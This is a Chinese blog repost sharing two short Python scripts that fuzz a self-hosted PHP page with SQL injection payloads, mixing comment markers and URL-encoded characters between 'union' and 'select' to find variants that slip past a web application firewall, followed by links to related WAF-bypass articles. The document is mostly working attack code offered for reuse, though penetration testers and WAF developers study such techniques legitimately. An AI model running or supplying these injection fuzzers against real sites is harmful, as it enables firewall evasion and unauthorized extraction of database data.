WAF Bypass FUZZ小脚本

最新推荐文章于 2023-06-25 16:10:30 发布
最新推荐文章于 2023-06-25 16:10:30 发布
阅读量209 收藏 1
点赞数
文章标签: php python
原文链接:https://yq.aliyun.com/articles/616786
版权

分享两个小脚本,用来WAF Bypass简单FUZZ的

第一个:先生成一个字典,带入搭建的环境进行FUZZ,针对某些软WAF挺好用的,可FUZZ出不少姿势出来,记得先把CC攻击加入白名单才行哦。。。

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
import urllib
import urllib2
import requests
values={} 
f = open('mutou.txt','r')
for line in f.xreadlines():
	line =line.strip()
	values['id'] = "1 union/*%s*/select/*%s*/1,user()" %(line,line)
	data = urllib.urlencode(values)
	url = "http://192.168.125.140/php/config/sql.php"
	url = url+'?'+data
	try:
		response = requests.get(url)
		result = response.content
		#print result
		if result.count('root'):
			print line
			print url
			print "==================================="
		else:
			pass
			#print ".",
	except:
		print "Error"

第二个:

#! /usr/bin/env python
# _*_  coding:utf-8 _*_

import requests

fuzz_dic1 = ['*/','/*','*/','/*!','*','=','`','!','@','%','.','-','+','|','%00']
fuzz_dic2 = ['*/','',' ','/*!']
fuzz_dic3 = ['/*!',"%a0","0c","%0a","%0b","%0c","%0d","%0e","%0f","%0g","%0h","%0i","%0j"]
headers={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0"}
url="http://192.168.125.140/php/config/sql.php?id=1"

for i in fuzz_dic1:
    for j in fuzz_dic2:
        for k in fuzz_dic3:
            payload="/*!union"+i+j+k+"select*/ 1,user()"
            geturl=url+payload
            #print geturl
            try:
                response=requests.get(url=geturl,headers=headers)
                result = response.content
                #print result
                if result.count('root'):
                    print geturl
                else:
                    print ".",
            except:
                print "Error"

 

weixin_33951761
关注
mysql注入fuzz字典_sql注入fuzz bypass waf
weixin_30467861的博客
01-28 794
本帖最后由 xmidf 于 2018-7-11 10:16 编辑作者:whynot 转自:先知0x0 前言这里是简单对sql注入绕过waf的一个小总结,非安全研究员,这里不讲原理,关于原理搜集了一些其他大佬的文章(文章在最下面请自取),感谢他们的分享,比着葫芦画瓢,对着各大waf厂商跟着师傅们来一波实战,进行一个简单的总结。0x1 注入点检测一般的注入还是很好判断的,特别是基于报错,但有...
第05篇:WAF Bypass数据库特性(Mysql探索篇)1
08-03
### WAF Bypass数据库特性(Mysql探索篇) #### 0x01 前言 在渗透测试或安全研究领域,绕过Web应用防火墙(WAF)是一项常见的技术挑战。WAF作为网站安全的第一道防线,通常会拦截并阻止恶意请求。然而,通过对SQL...
other_dumbfuzz:我的其他愚蠢的模糊测试脚本。 也许有用或可能没有用
03-17
other_dumbfuzz 我的其他愚蠢的模糊测试脚本。 也许有用或可能没有用 fuzz_bash.sh 使用radamsa,对其进行变异并使用netcat发送到网络。 所有语料库也被保存。 replay_corpus.sh 如果您想重播并缩小崩溃范围,这将从上方保留已保存的语料库,并重播。 这是一种手工操作,但是在不失去灵活性的情况下,没有什么可以自动化。
python fuzz脚本(利用数组)
04-29 854
python fuzz脚本(利用数组) 1 import types 2 a = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v...
多线程FUZZ WAFpython脚本
夜班机器人的博客
02-09 2370
#!/usr/bin/python #coding:utf-8 ''' 学习了Va1n3R的注入绕过思路,自己也学习一下fuzz脚本的编写 规则库还是使用Va1n3R的 fuzz_zs = ['/*','*/','/*!','*','=','`','!','@','%','.','-','+','|','%00'] fuzz_sz ...
WAF Bypass数据库特性(Access探索篇).pdf
最新发布
04-22
### WAF Bypass数据库特性(Access探索篇) #### 0x01 前言 在网络安全领域,尤其是渗透测试过程中,WAF(Web Application Firewall)作为一道重要的安全防线,经常被用于防止各种针对Web应用的攻击行为。然而,对于...
WAF Bypass数据库特性(Oracle探索篇).pdf
04-22
### WAF Bypass数据库特性(Oracle探索篇) #### 0x01 前言 在信息安全领域,尤其是渗透测试和红蓝对抗等实战场景中,利用特定数据库的特性进行Web应用防火墙(WAF)的绕过是一种非常实用且有效的技术手段。本篇...
WAF Bypass数据库特性(MSsql探索篇).pdf
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
“1000中姿势”绕过软WAF-漏洞银行大咖面对面33-@13nR
01-25
资源来自:漏洞银行大咖面对面技术讲座; 作者:@13nR
6. xss_fuzz+wafbypass
HWHXY的博客
01-17 344
layout: post title: 6. xss_fuzz+wafbypass category: SRC tags: SRC keywords: SRC,XSS 前言 该篇记录为记录实际的src过程第6篇小文章,内容为某网站的xssbypass。 特征 输入点为callback,全网漫游找到的,waf很强。很多标签都无法使用,<script> frame body,style,只要出现了就直接触发waf.能够通过的有a标签和img标签,这里尝试用a标签bypass,发现对javasc.
sqlmap tamper脚本_Fuzz脚本的编写
weixin_39833270的博客
11-26 159
原创: Naivete 合天智汇 目录1.mysqlsql注入2.环境搭建3.fuzz脚本编写4.嵌入到sqlmap的tamper脚本能力有限,仅以sql注入为例子(其中以某学长的提醒,某行嘉宾前辈的课程和讲解为基础,以网上前辈各大博客为拓展写出此文)5.总结1. mysql sql注入略。2. 环境搭建这里详细说下,坑有些,浪费时间性价比不高1某狗下载http://free.safedog.cn...
[FUZZ]文件上传fuzz字典生成脚本—使用方法
mingyqf的博客
04-20 2382
[FUZZ]文件上传fuzz字典生成脚本—使用方法 文件上传fuzz字典生成脚本—使用方法 原作者:c0ny1 项目地址:https://github.com/c0ny1/upload-fuzz-dic-builder 项目预览效果图: 帮助手册: 脚本可以自定义生成的上传文件名(-n),允许的上传的后缀(-a),后端语言(-l),中间件(-m),操作系统(–os),是否加入双后缀(-d)以及输出的字典文件名(-o)。 我们可以根据场景的不同,来生成合适的字典,提供的信息越详细,脚本生成的字典越精确!
webshell 常见 Bypass waf 技巧总结
07-21 521
在渗透学习的过程中,总会遇到各种情况,例如 php 大马被 waf 拦截的时候,那么如何制作免杀 php webshell 呢,接下来就由我带各位小伙伴们一起踏上大马免杀之路,不喜勿喷。 一篇好的文章,内容可以差,目录一定要 ~~ 吹牛 ~~ 真实。 一. webshell 免杀 0x0 php 内置函数加密 小例子: 在制作免杀大马之前,我们先来看看,一个带后门的免杀 ph...
绕过WAF脚本
qq_35620997的博客
03-06 408
https://blog.csdn.net/whatday/article/details/54774043
FUZZ工具—Boofuzz框架实际使用
samli的博客
06-25 3118
接着上一篇文章来对框架进行实际的使用;官方提供了很多案例模板,且网上关于boofuzz的使用介绍很多,也比较成熟,在各个领域都有,可以通过官方提供的案例也看得出来,然后覆盖的面也非常的全,目前也就只有ble、zigbee这种无线电通信协议的覆盖不了,下面用一个简单的测试来学习一下boofuzz的使用,来挖掘一下漏洞;
从SQL注入绕过最新安全狗WAF中学习fuzz
quan9i的博客
06-11 1198
声明:文章首发于先知社区
FUZZ测试某狗WAF绕过
JBlock的博客
03-17 6529
题记 Fuzz是安全测试的一种方法,也是极为重要的一种手段!当你面对waf无所适从的时候,这时候你就可以Fuzz模糊测试来绕过waf,甚至你可以发现一些意想不到的姿势!最近两天我会对fuzz测试进行介绍!主要内容是Fuzz脚本编写和Fuzz思路!如果你想,这里会有无数种姿势让你bypass! 文章目录题记正文环境准备FUZZ思路后记 正文 环境准备 测试靶场:sql-libs 安全软件:某狗最新版...
MSSQL数据库特性与WAF Bypass探索
本文主要探讨了如何利用WAF Bypass技术针对MSSQL数据库进行SQL注入攻击的策略,重点介绍了MSSQL中的特殊字符、注释符号、浮点数和科学计数法、运算符以及不同环境下的字符差异,以此来绕过安全防护。 在MSSQL数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值